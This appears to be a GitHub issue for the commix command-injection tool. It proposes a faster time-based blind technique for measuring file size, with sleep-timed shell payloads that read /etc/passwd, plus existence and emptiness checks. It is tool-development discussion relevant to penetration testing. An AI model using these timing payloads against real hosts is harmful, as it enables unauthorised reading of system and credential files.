Description
Hi,
I was running commix against a time based vulnerable host, and noticed that it took a lot of time to determine the size of a file when using --file-read. The problem is that it's using the increment technique (e.g. - Is the file size equal to 1 ? - No. Is the file size equal to 2 ? - No. etc.).
Check this python pseudo-code, which illustrates an idea to improve the efficiency :
stat --printf="%s" /etc/passwd -> 3671 (but it's blind, we don't see it directly)
file_length = ''
cmd_output_length = exec('out_length=$(stat --printf="%s" /etc/passwd) && sleep $(expr length "$out_length")').elapsed_time() # Grab output length, e.g. 4 in "3671"
for i in cmd_output_length:
# We iterate over each character of the "stat" output, and sleep accordingly to its value
file_length += exec(f'tts="$(stat --printf="%s" /etc/passwd | cut -c{i+1}-{i+1})" && sleep "$tts"').elapsed_time() # tts = time to sleep
# file_length = '3671'It it is not necessary to sleep "3" seconds for number 3, we can use the increment technique on each digit, as it may be faster too. The improvement reside in the "stat --printf="%s" /etc/passwd".
The time gained is considerable I think, compared to the actual version :
str="$(echo $(cat /etc/passwd))"
str1=$(expr length "$str")
if [ 22 -ne $str1 ]
then sleep 0
else sleep 1
fi I do not know the project enough to provide a PR, but I'd like to hear your thoughts about this idea !
NB : I also noticed that commix wasn't checking if the file existed, or if it was empty. I think this could be easily fixed too :
test -f file || sleep 1 # Check if file exists
[ -s file ] || sleep 1 # Check if file exists but is empty